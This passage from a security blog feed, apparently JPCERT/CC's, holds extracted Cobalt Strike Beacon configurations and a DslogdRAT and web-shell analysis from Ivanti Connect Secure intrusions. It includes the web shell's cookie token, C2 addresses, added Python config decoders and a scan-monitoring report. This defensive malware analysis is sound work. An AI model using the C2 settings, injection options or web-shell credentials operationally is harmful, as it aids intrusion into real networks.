b'f\x0f\x1fD\x00\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00\x90\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00' ProcInject_PrependAppend_x64 - b'\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00f\x90PX\x0f\x1f@\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f@\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x90PX\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f@\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f@\x00f\x0f\x1fD\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00' b'\x90\x0f\x1f\x00PX\x90PX\x0f\x1f@\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00PX\x0f\x1f\x84\x00\x00\x00\x00\x00f\x90PX\x0f\x1fD\x00\x00\x0f\x1fD\x00\x00' ProcInject_Execute - ntdll:RtlUserThreadStart CreateThread NtQueueApcThread-s CreateRemoteThread RtlCreateUserThread ProcInject_AllocationMethod - NtMapViewOfSection bUsesCookies - True HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - failover DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - 100 DNS_strategy_fail_seconds - -1 Retry_Max_Attempts - 0 Retry_Increase_Attempts - 0 Retry_Duration - 0 </pre> <ul> <li>Cobalt Strike configuration</li> </ul> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'> BeaconType - HTTPS Port - 443 SleepTime - 92318 MaxGetSize - 1408170 Jitter - 48 MaxDNS - Not Found PublicKey_MD5 - 492cdc5bc3d8cc5e6440a0da246f6684 C2Server - query.datasophos[.]com,/Enable/v5.10/VPGH7WQQPR UserAgent - Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 HttpPostUri - /Enable/v8.20/STE7U5WILZII Malleable_C2_Instructions - Remove 7449 bytes from the end Remove 2614 bytes from the beginning Base64 URL-safe decode XOR mask 
w/ random key HttpGet_Metadata - ConstHeaders Accept: application/xml, application/xhtml+xml, image/* Accept-Language: fr-lu Accept-Encoding: gzip, br Metadata mask netbios prepend "affiliate_id_69W8Y3G469RVG2W2=" header "Cookie" HttpPost_Metadata - ConstHeaders Accept: application/xhtml+xml, image/*, text/html Accept-Language: zh-tw Accept-Encoding: compress, gzip SessionId mask netbios parameter "_TXLXHKQC" Output mask netbiosu print PipeName - Not Found DNS_Idle - Not Found DNS_Sleep - Not Found SSH_Host - Not Found SSH_Port - Not Found SSH_Username - Not Found SSH_Password_Plaintext - Not Found SSH_Password_Pubkey - Not Found SSH_Banner - HttpGet_Verb - GET HttpPost_Verb - POST HttpPostChunk - 0 Spawnto_x86 - %windir%\syswow64\w32tm.exe Spawnto_x64 - %windir%\sysnative\WUAUCLT.exe CryptoScheme - 0 Proxy_Config - Not Found Proxy_User - Not Found Proxy_Password - Not Found Proxy_Behavior - Use IE settings Watermark_Hash - MYhXSMGVvcr7PtOTMdABvA== Watermark - 666666 bStageCleanup - True bCFGCaution - False KillDate - 0 bProcInject_StartRWX - False bProcInject_UseRWX - False bProcInject_MinAllocSize - 6344 ProcInject_PrependAppend_x86 - b'PX\x0f\x1f\x84\x00\x00\x00\x00\x00f\x0f\x1fD\x00\x00PXf\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x90f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x80\x00\x00\x00\x00\x90\x90\x90\x0f\x1f\x80\x00\x00\x00\x00\x90' b'f\x0f\x1fD\x00\x00\x0f\x1f@\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f@\x00' ProcInject_PrependAppend_x64 - b'\x0f\x1f\x00\x90PX\x0f\x1f\x80\x00\x00\x00\x00f\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1f\x00\x0f\x1f\x80\x00\x00\x00\x00\x0f\x1f\x00\x90\x90' b'\x0f\x1f\x00PXf\x0f\x1f\x84\x00\x00\x00\x00\x00\x0f\x1fD\x00\x00f\x0f\x1fD\x00\x00' ProcInject_Execute - ntdll:RtlUserThreadStart CreateThread NtQueueApcThread-s CreateRemoteThread RtlCreateUserThread 
ProcInject_AllocationMethod - VirtualAllocEx bUsesCookies - True HostHeader - headersToRemove - Not Found DNS_Beaconing - Not Found DNS_get_TypeA - Not Found DNS_get_TypeAAAA - Not Found DNS_get_TypeTXT - Not Found DNS_put_metadata - Not Found DNS_put_output - Not Found DNS_resolver - Not Found DNS_strategy - round-robin DNS_strategy_rotate_seconds - -1 DNS_strategy_fail_x - -1 DNS_strategy_fail_seconds - -1 Retry_Max_Attempts - 0 Retry_Increase_Attempts - 0 Retry_Duration - 0 </pre>
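The post above describes three RC4 uses in the same intrusion set: MDifyLoader decrypting its data file with the MD5 of the side-loaded legitimate executable as the key, the modified Beacon decoding its configuration with the hard-coded key "google", and the Fscan loader using "99999999". The Python below is an added triage example, not JPCERT/CC's code or any of the loaders' actual implementations; it models the MDifyLoader key dependency so an analyst can test whether a recovered executable/data-file pair belongs together. The function names, the MZ/PE plausibility check and the sample bytes are constructed for illustration, and because the post does not say whether the raw 16-byte digest or its hex string is the key, both are tried.

```python
import hashlib
from typing import List, Optional


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def candidate_keys(exe_bytes: bytes) -> List[bytes]:
    """Key candidates derived from the side-loaded legitimate executable, as the
    post describes MDifyLoader: the MD5 of that file. The post does not say whether
    the raw 16-byte digest or its hex string is used, so both are tried (assumption)."""
    digest = hashlib.md5(exe_bytes).digest()
    return [digest, digest.hex().encode()]


def looks_like_pe(blob: bytes) -> bool:
    """Minimal plausibility check for a decrypted payload: MZ magic and an
    e_lfanew that points at a 'PE\\0\\0' signature."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def mdify_recover_payload(exe_bytes: bytes, data_file: bytes) -> Optional[bytes]:
    """Triage helper (hypothetical name): given the legitimate executable and the
    encrypted data file found next to the loader, return the decrypted payload if it
    decrypts to something PE-shaped, else None (wrong executable or wrong pairing)."""
    for key in candidate_keys(exe_bytes):
        plain = rc4(key, data_file)
        if looks_like_pe(plain):
            return plain
    return None


def _fake_pe(tail: bytes) -> bytes:
    # Constructed stand-in for a PE file: MZ header, e_lfanew = 0x40, 'PE\0\0', marker.
    return b"MZ" + b"\x00" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + tail


# Constructed sample files (not the real samples from the post).
SAMPLE_EXE = _fake_pe(b"push_detect-stand-in")
SAMPLE_BEACON = _fake_pe(b"NewBeacon.dll-stand-in")
SAMPLE_DATA_FILE = rc4(hashlib.md5(SAMPLE_EXE).digest(), SAMPLE_BEACON)

if __name__ == "__main__":
    print("correct exe :", mdify_recover_payload(SAMPLE_EXE, SAMPLE_DATA_FILE) == SAMPLE_BEACON)
    # One changed byte in the executable changes the MD5, hence the RC4 key, hence
    # nothing is recoverable: this is the three-piece dependency the post describes.
    tampered = SAMPLE_EXE[:-1] + b"!"
    print("tampered exe:", mdify_recover_payload(tampered, SAMPLE_DATA_FILE))
```

The same `rc4` call applied with the keys quoted in the post ("google" for the Beacon configuration, "99999999" for k.bin) is what a configuration extractor for those two components would need.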
  48. TSUBAME Report Overflow (January to March 2025)

    Fri, 06 Jun 2025 02:00:00 -0000

    Introduction This blog, "TSUBAME Report Overflow", is published every quarter...
    <h3>Introduction</h3> <p>This blog, "TSUBAME Report Overflow", is published alongside the quarterly "<a href="https://www.jpcert.or.jp/tsubame/report/">Internet Threat Monitoring Report</a>" and covers topics not described in the report, such as comparisons of observation trends from sensors installed overseas and other activities.<br>This time we introduce the observation results of TSUBAME (the Internet threat monitoring system) for January to March 2025.</p>
    <h3>Impact on Japan as seen from the FY2024 observations</h3> <p>JPCERT/CC analyzes the data collected by TSUBAME every day. Here we look back at examples of incidents related to Japan from the FY2024 observation results.<br> As mentioned in the Internet Threat Monitoring Report, the packets TSUBAME observes most are probes to 23/TCP. Packets observed to 23/TCP sometimes have Mirai characteristics. Figure 1 shows the share of packets with these characteristics. Around May 2024, from September to December 2024, and around March 2025, packets with Mirai characteristics exceeded 50% of the packets to 23/TCP. In the other periods we observed packets without Mirai characteristics that targeted other IoT devices, and the targeted IoT devices were diverse.</p> <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig1.png" width="1153" height="552" alt="" class="asset asset-image at-xid-3752125" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">Figure 1: Trend in the number of sources in Japan sending packets with Mirai characteristics to port 23/TCP</td> </tr> </tbody> </table> <p>When TSUBAME observes suspicious scans, for source IP addresses located in Japan we try to collect information and identify the device causing the scans using web responses, SHODAN and similar services, in order to notify the incident and provide information. In the three characteristic periods listed above, the following devices stood out among the sources.</p> <ul> <li>Around May 2024: routers made by overseas vendors (TP-Link etc.)</li> <li>September to December 2024: surveillance cameras, DVRs and NAS devices made by overseas vendors</li> <li>February to March 2025: routers made by overseas vendors (ASUS etc.)</li> </ul> <p>Source IP addresses from which probes with Mirai characteristics were confirmed also send traffic to ports other than 23/TCP. The probes are presumably carried out with knowledge of the communication ports reachable from the Internet and the vulnerability information of the targeted products.<br/> During the same period we also observed backscatter packets from the web servers of multiple companies. Since these are considered part of DDoS attacks against those organizations, we provided the observation data through channels such as CSIRT communities.<br/> Based on the knowledge gained from these activities, we provided information on Mirai attack trends to domestic product developers and telecommunications carriers and discussed countermeasures with them. When connecting routers and similar devices to the Internet, it is essential to take care not to spread Mirai infections and to prevent the expansion of botnets. Be aware that attackers can also reach such devices over the Internet: use the latest firmware, apply appropriate settings, and operate them with care. After installation, we also recommend running a port scan to check that unnecessary ports have not become reachable, and checking with services such as SHODAN. TSUBAME anticipates that attacks targeting specific products and sources of suspicious packets will continue to appear, and plans to keep providing observation data and other information to product developers and telecommunications carriers to help resolve such problems.</p>
    <h3>Comparison of observation trends in Japan and overseas</h3> <p>Figure 2 compares, by month, the average number of packets received per day by a single sensor in Japan and overseas from January to March. The overseas sensors observed more packets than the domestic sensors, and in March the number of packets increased both in Japan and overseas.</p> <table style="border-collapse: collapse; width: 110.24%; height: 36px;" border="1"> <tbody> <tr style="height: 18px;"> <td style="width: 50%; height: 18px;"> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2024q4blogfig2.png" width="1152" height="549" alt="" class="asset asset-image at-xid-3752127" style="display: block;"/></a> </td> </tr> <tr style="height: 18px;"> <td style="width: 48.0795%; height: 18px; text-align: center;">Figure 2: Monthly comparison of average packet counts at domestic and overseas sensors</td> </tr> </tbody> </table>
    <h3>Comparison of observation trends by sensor</h3> <p>Each sensor is assigned one global IP address. To see whether the observations differ by sensor, Table 1 summarizes the top 10 packets received by each domestic and overseas sensor. Although the rankings differ by sensor, 23/TCP, 6379/TCP, 22/TCP, 8080/TCP, 80/TCP, ICMP and so on were observed at almost all sensors. This suggests that scanning is being carried out across a wide range of networks.</p> <p style="text-align: center;">Table 1: Comparison of the top 10 packets at domestic and overseas sensors</p> <table> <tbody> <tr><th></th><th>Domestic sensor 1</th><th>Domestic sensor 2</th><th>Domestic sensor 3</th><th>Overseas sensor 1</th><th>Overseas sensor 2</th><th>Overseas sensor 3</th></tr> <tr><td align="right">1st</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>ICMP</td></tr> <tr><td align="right">2nd</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>23/TCP</td></tr> <tr><td align="right">3rd</td><td>123/UDP</td><td>80/TCP</td><td>22/TCP</td><td>22/TCP</td><td>80/TCP</td><td>8728/TCP</td></tr> <tr><td align="right">4th</td><td>22/TCP</td><td>22/TCP</td><td>80/TCP</td><td>80/TCP</td><td>ICMP</td><td>22/TCP</td></tr> <tr><td align="right">5th</td><td>80/TCP</td><td>ICMP</td><td>ICMP</td><td>ICMP</td><td>443/TCP</td><td>80/TCP</td></tr> <tr><td align="right">6th</td><td>ICMP</td><td>8080/TCP</td><td>443/TCP</td><td>443/TCP</td><td>22/TCP</td><td>443/TCP</td></tr> <tr><td align="right">7th</td><td>8080/TCP</td><td>443/TCP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td><td>8080/TCP</td></tr> <tr><td align="right">8th</td><td>443/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>6379/TCP</td><td>3389/TCP</td></tr> <tr><td align="right">9th</td><td>6379/TCP</td><td>81/TCP</td><td>34567/TCP</td><td>445/TCP</td><td>2222/TCP</td><td>445/TCP</td></tr> <tr><td align="right">10th</td><td>34567/TCP</td><td>123/UDP</td><td>445/TCP</td><td>2222/TCP</td><td>3389/TCP</td><td>34567/TCP</td></tr> </tbody> </table>
    <h3>Conclusion</h3> <p>Observing at multiple points makes it possible to judge whether a fluctuation is occurring only in a specific network. This quarter did not warrant a special extra-edition alert, but the presence of scanners still requires attention. We plan to continue publishing this blog regularly alongside each report, and will issue an extra edition when there are unusual changes. We also welcome your opinions and feedback. If there are topics you would like us to dig into or content you would like us to cover, please send them through the contact form. Thank you for reading to the end.</p> <p style="text-align: right">Cyber Metrics Group 鹿野 恵祐</p>
  49. DslogdRAT: malware installed on Ivanti Connect Secure

    Thu, 24 Apr 2025 06:00:00 -0000

    Previously, the malware installed by exploiting the Ivanti Connect Secure vulnerability...
    <p>We previously introduced <a href="https://blogs.jpcert.or.jp/ja/2025/02/spawnchimera.html" target="_blank">the malware SPAWNCHIMERA, installed by exploiting an Ivanti Connect Secure vulnerability</a>, but malware other than SPAWNCHIMERA has also been confirmed. This post describes a web shell and the malware DslogdRAT that were installed around December 2024 in attacks against organizations in Japan using CVE-2025-0282, which was a zero-day vulnerability at the time.</p>
    <h3>Functions of the installed web shell</h3> <p>Figure 1 shows part of the web shell, which is written in Perl. This Perl script runs as a CGI program and is a simple web shell: it reads the Cookie header of the received HTTP request and, if the value of <strong>DSAUTOKEN=</strong> matches <strong>af95380019083db5</strong>, executes the arbitrary command given in the request parameter <strong>data</strong> via the system function. The attackers presumably accessed this web shell and executed commands through it to run malware such as DslogdRAT, described next.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat01-800wri.png" width="800" height="355" alt="" class="asset asset-image at-xid-3713877 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 1: Part of the web shell </div> <p><br></p>
    <h3>Overview of DslogdRAT</h3> <p>Figure 2 shows the operation flow of DslogdRAT. When DslogdRAT runs, the main process creates a first child process and then exits. That child process decodes the configuration and creates a second child process. The first child process enters a loop routine containing a sleep, so it does not exit. The second child process contains DslogdRAT's main functions, which are as follows.</p> <ul> <li>Starts communication with the C2 server based on the configuration data</li> <li>Launches a worker thread and hands the socket used for communication to that thread</li> </ul> <p>The worker thread handles sending data to and receiving data from the C2 server and executing the various commands. Thread creation and related operations are implemented with the pthread library.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat02-800wri.png" width="800" height="384" alt="" class="asset asset-image at-xid-3713878 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 2: Operation flow of DslogdRAT </div> <p><br></p>
    <h3>DslogdRAT configuration data</h3> <p>DslogdRAT's configuration data is hard-coded in the sample in encoded form and is decoded byte by byte with XOR using <strong>0x63</strong> as the key. The structure of the configuration is shown in Table 1 of Appendix A, and the decoded configuration data in Table 2.</p> <p>From the decoded configuration data, DslogdRAT was configured to operate from <strong>8:00 to 20:00</strong> and to sleep outside those hours. This is presumably intended to make it harder to notice by communicating only during business hours.</p> 
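As an added example (not JPCERT/CC's code or DslogdRAT's own), the following Python turns the description above and the offsets of Table 1 in Appendix A into a configuration extractor: it locates the 0x63-XOR-encoded ConfigTag in a sample or memory dump, decodes the block that follows and pulls out each field. Treating the numeric fields as 4-byte little-endian integers, the half-open hour window and the function names are assumptions; the sample blob is constructed from the Table 2 values and is not a real binary.

```python
import struct
from typing import Dict, Optional

XOR_KEY = 0x63

# Field layout taken from Table 1 (Appendix A) of the post: (offset, name, size, kind).
# Treating each numeric field as a 4-byte little-endian integer is an assumption here.
CONFIG_LAYOUT = [
    (0x000, "config_tag", 4, "raw"),
    (0x004, "listen_mode", 4, "int"),
    (0x008, "c2_ip", 0x100, "str"),
    (0x108, "c2_port", 4, "int"),
    (0x10C, "sleep_time", 4, "int"),
    (0x110, "timeout", 4, "int"),
    (0x114, "shell_path", 0x100, "str"),
    (0x214, "shell_cmd_string", 0x100, "str"),
    (0x314, "thread_string", 0x100, "str"),
    (0x414, "node_name", 0x100, "str"),
    (0x514, "proxy_server", 0x100, "str"),
    (0x614, "proxy_user", 0x100, "str"),
    (0x714, "proxy_password", 0x100, "str"),
    (0x814, "proxy_port", 4, "int"),
    (0x818, "lower_hour", 4, "int"),
    (0x81C, "upper_hour", 4, "int"),
    (0x820, "enable_source_port", 4, "int"),
    (0x824, "setsockopt_value", 4, "int"),
    (0x828, "source_port", 4, "int"),
    (0x82C, "enable_sleep_1", 4, "int"),
    (0x830, "enable_sleep_2", 4, "int"),
]
CONFIG_SIZE = 0x834
CONFIG_TAG = bytes.fromhex("9582e30e")  # decoded ConfigTag value from Table 2


def xor_decode(blob: bytes, key: int = XOR_KEY) -> bytes:
    """Single-byte XOR; the same call encodes and decodes."""
    return bytes(b ^ key for b in blob)


def parse_config(decoded: bytes) -> Dict[str, object]:
    """Slice an already-decoded block into the fields of CONFIG_LAYOUT."""
    if len(decoded) < CONFIG_SIZE:
        raise ValueError("config blob too short")
    cfg: Dict[str, object] = {}
    for off, name, size, kind in CONFIG_LAYOUT:
        raw = decoded[off:off + size]
        if kind == "int":
            cfg[name] = struct.unpack("<I", raw)[0]
        elif kind == "str":
            cfg[name] = raw.split(b"\x00", 1)[0].decode("ascii", "replace")
        else:
            cfg[name] = raw
    return cfg


def find_config(sample: bytes) -> Optional[Dict[str, object]]:
    """Locate the XOR-encoded ConfigTag in a sample or memory dump and parse the
    CONFIG_SIZE bytes that follow it. Returns None when no tag is found."""
    idx = sample.find(xor_decode(CONFIG_TAG))
    if idx < 0 or idx + CONFIG_SIZE > len(sample):
        return None
    return parse_config(xor_decode(sample[idx:idx + CONFIG_SIZE]))


def active_at(cfg: Dict[str, object], hour: int) -> bool:
    """Apply the configured operating window (Table 2: 8 to 20). Whether the upper
    bound is inclusive is not stated in the post; half-open is assumed here."""
    return int(cfg["lower_hour"]) <= hour < int(cfg["upper_hour"])


def _build_sample() -> bytes:
    """Constructed sample (not a real binary): Table 2 values encoded with 0x63 and
    surrounded by filler, so find_config has to locate the tag first."""
    buf = bytearray(CONFIG_SIZE)
    ints = {0x004: 0, 0x108: 443, 0x10C: 1250, 0x110: 30, 0x814: 65500, 0x818: 8,
            0x81C: 20, 0x820: 0, 0x824: 240, 0x828: 12345, 0x82C: 1, 0x830: 1}
    strs = {0x008: "3.112.192.119", 0x114: "/bin/sh", 0x214: "[kworker/0:02]",
            0x314: "/home/bin/dslogd", 0x514: "127.0.0.1", 0x614: "admin", 0x714: "admin"}
    buf[0:4] = CONFIG_TAG
    for off, value in ints.items():
        buf[off:off + 4] = struct.pack("<I", value)
    for off, text in strs.items():
        buf[off:off + len(text)] = text.encode()
    return b"\x7f" * 64 + xor_decode(bytes(buf)) + b"\x7f" * 16


SAMPLE_BLOB = _build_sample()

if __name__ == "__main__":
    cfg = find_config(SAMPLE_BLOB)
    print("C2:", cfg["c2_ip"], cfg["c2_port"], "window:", cfg["lower_hour"], "-", cfg["upper_hour"])
```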
    <h3>DslogdRAT's communication method and command execution</h3> <p>DslogdRAT exchanges data with the C2 server over socket communication. The data exchanged is encoded by the function shown in Figure 3. The encode/decode function is a simple one that just XORs 7 bytes at a time with 0x01 through 0x07. Communication through a proxy is also supported.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat03-800wri.png" width="800" height="497" alt="" class="asset asset-image at-xid-3713879 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 3: DslogdRAT's encode/decode method </div> <p><br></p> <p>Figure 4 shows a decoded example of the initial communication to the C2 server. In the initial communication, basic information about the host is sent to the C2 server. The data is sent in the following format.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>
0x00:  ff ff ff ff
+0x04: 0f 00
+0x06: Data length
+0x0A: Encoded data
</pre> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/dslogdrat04-800wri.png" width="800" height="168" alt="" class="asset asset-image at-xid-3713880 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 4: Decoded example of DslogdRAT's initial communication </div> <p><br></p> <p>As shown below, the commands DslogdRAT can execute include functions that could serve as a foothold for compromising the internal network. Details of the commands are given in Appendix B.</p> <ul> <li>File upload and download</li> <li>Shell command execution</li> <li>Proxy function</li> </ul>
    <h3>SPAWNSNARE</h3> <p>In addition, SPAWNSNARE, which was reported<a href="#1">[1]</a><a href="#2">[2]</a> by CISA and Google in April 2025, was confirmed on the same host as another installed malware. For details of SPAWNSNARE's behavior, please refer to Google's article<a href="#1">[1]</a>.</p>
    <h3>Conclusion</h3> <p>It is currently unknown whether the attacks using DslogdRAT belong to the same campaign<a href="#1">[1]</a> as the attacks by UNC5221 using the SPAWN family. The confirmed communication destination, hash values and file paths are listed in Appendices C and D respectively. JPCERT/CC has issued an <a href="https://www.jpcert.or.jp/at/2025/at250008.html" target="_blank">alert</a> on the Ivanti Connect Secure-related vulnerability (CVE-2025-22457), and attacks targeting Ivanti Connect Secure are expected to continue. Continued vigilance against these attacks is required.</p> <p style="text-align: right">Incident Response Group 増渕 維摩</p> <h4>References</h4> <p><a name="1"></a>[1] 
Google Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457) <a href="https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability" target="_blank"><br>https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability</a></p> <p><a name="2"></a>[2] CISA MAR-25993211-r1.v1 Ivanti Connect Secure (RESURGE) <a href="https://www.cisa.gov/news-events/analysis-reports/ar25-087a" target="_blank"><br>https://www.cisa.gov/news-events/analysis-reports/ar25-087a</a></p> <h4>Appendix A: Configuration</h4> <div style="text-align: center;"> Table 1: DslogdRAT configuration structure </div> <table> <thead> <tr> <th>Offset</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>0x0</td> <td>ConfigTag</td> </tr> <tr> <td>0x4</td> <td>Listen mode flag</td> </tr> <tr> <td>0x8</td> <td>C2 IP</td> </tr> <tr> <td>0x108</td> <td>C2 Port</td> </tr> <tr> <td>0x10C</td> <td>Sleep time</td> </tr> <tr> <td>0x110</td> <td>Timeout value</td> </tr> <tr> <td>0x114</td> <td>Shell filepath</td> </tr> <tr> <td>0x214</td> <td>String used in shell command</td> </tr> <tr> <td>0x314</td> <td>String used in thread</td> </tr> <tr> <td>0x414</td> <td>String used in node name</td> </tr> <tr> <td>0x514</td> <td>Proxy server</td> </tr> <tr> <td>0x614</td> <td>Proxy user</td> </tr> <tr> <td>0x714</td> <td>Proxy password</td> </tr> <tr> <td>0x814</td> <td>Proxy port</td> </tr> <tr> <td>0x818</td> <td>Lower hour limit</td> </tr> <tr> <td>0x81C</td> <td>Upper hour limit</td> </tr> <tr> <td>0x820</td> <td>Enable source port settings(Default port: 3039)</td> </tr> <tr> <td>0x824</td> <td>Used in setsockopt</td> </tr> <tr> <td>0x828</td> <td>Source port</td> </tr> <tr> <td>0x82C</td> <td>Enable sleep time</td> </tr> <tr> <td>0x830</td> <td>Enable sleep time</td> </tr> </tbody> </table> <div style="text-align: center;"> Table 2: Decoded configuration data </div> <table> <thead> <tr> <th>Description</th> 
<th>Content</th> </tr> </thead> <tbody> <tr> <td>ConfigTag</td> <td>95 82 e3 0e</td> </tr> <tr> <td>Listen mode flag</td> <td>0</td> </tr> <tr> <td>C2 IP</td> <td>3.112.192[.]119</td> </tr> <tr> <td>C2 Port</td> <td>443</td> </tr> <tr> <td>Sleep time</td> <td>1250</td> </tr> <tr> <td>Timeout value</td> <td>30</td> </tr> <tr> <td>Shell filepath</td> <td>/bin/sh</td> </tr> <tr> <td>String used in shell command</td> <td>[kworker/0:02]</td> </tr> <tr> <td>String used in thread</td> <td>/home/bin/dslogd</td> </tr> <tr> <td>String used in node name</td> <td>null</td> </tr> <tr> <td>Proxy server</td> <td>127.0.0.1</td> </tr> <tr> <td>Proxy user</td> <td>admin</td> </tr> <tr> <td>Proxy password</td> <td>admin</td> </tr> <tr> <td>Proxy port</td> <td>65500</td> </tr> <tr> <td>Lower hour limit</td> <td>8</td> </tr> <tr> <td>Upper hour limit</td> <td>20</td> </tr> <tr> <td>Enable source port settings (default port: 3039)</td> <td>0</td> </tr> <tr> <td>Used in setsockopt</td> <td>240</td> </tr> <tr> <td>Source port</td> <td>12345</td> </tr> <tr> <td>Enable sleep time</td> <td>1</td> </tr> <tr> <td>Enable sleep time</td> <td>1</td> </tr> </tbody> </table> <h4>Appendix B: Commands</h4> <div style="text-align: center;"> Table 3: DslogdRAT command list </div> <table> <thead> <tr> <th>Value</th> <th>Contents</th> </tr> </thead> <tbody> <tr> <td>0x4</td> <td>File download</td> </tr> <tr> <td>0x8</td> <td>Set upload file</td> </tr> <tr> <td>0xA</td> <td>File upload</td> </tr> <tr> <td>0xC</td> <td>Shell</td> </tr> <tr> <td>0xD</td> <td>Get shell data</td> </tr> <tr> <td>0xE</td> <td>Exit shell</td> </tr> <tr> <td>0x11</td> <td>Set sleep time</td> </tr> <tr> <td>0x13</td> <td>Run proxy</td> </tr> <tr> <td>0x16</td> <td>Get proxy data</td> </tr> <tr> <td>0x17</td> <td>Stop proxy</td> </tr> <tr> <td>0x18</td> <td>Stop all proxy</td> </tr> <tr> <td>0x28</td> <td>Forwarding</td> </tr> <tr> <td>0x29</td> <td>Stop forwarding</td> </tr> </tbody> </table> <h4>Appendix C: Network indicators</h4> <ul> <li>DslogdRAT C2 server: 
3.112.192[.]119</li> </ul> <h4>Appendix D: Malware hashes</h4> <div style="text-align: center;"> Table 4: File paths and hash values </div> <table> <thead> <tr> <th>File</th> <th>Path</th> <th>Hash (SHA-256)</th> </tr> </thead> <tbody> <tr> <td>DslogdRAT</td> <td>/home/bin/dslogd</td> <td>1dd64c00f061425d484dd67b359ad99df533aa430632c55fa7e7617b55dab6a8</td> </tr> <tr> <td>Webshell</td> <td>/home/webserver/htdocs/dana-na/cc/ccupdate.cgi</td> <td>f48857263991eea1880de0f62b3d1d37101c2e7739dcd8629b24260d08850f9c</td> </tr> <tr> <td>SPAWNSNARE</td> <td>/bin/dsmain</td> <td>b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d</td> </tr> </tbody> </table>
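<p>The wire format described in the communication section above, as an added worked example (this is not code from the JPCERT/CC post or from the malware; every name in it is this example's own): a Python encoder/decoder for the repeating 7-byte XOR key and a parser that walks a reassembled TCP stream and decodes every ff ff ff ff / 0f 00 frame it finds. It assumes that the data length is the 4 bytes at +0x06 in little-endian byte order and that the key restarts at the beginning of each frame, neither of which the post states explicitly; the beacon text is constructed, not taken from a capture.</p>

```python
"""DslogdRAT C2 frame codec and stream scanner.

Added example for this page; it is not code from the JPCERT/CC post or from
the malware. It implements the wire format the post describes: payloads XORed
with the repeating 7-byte key 01 02 03 04 05 06 07, wrapped in a frame
ff ff ff ff | 0f 00 | data length | encoded data. Assumptions not stated in
the post: the length field is the four bytes from +0x06 to +0x0A and is
little-endian, and the key restarts at the beginning of every frame. The
beacon text below is constructed, not taken from a capture.
"""
import struct

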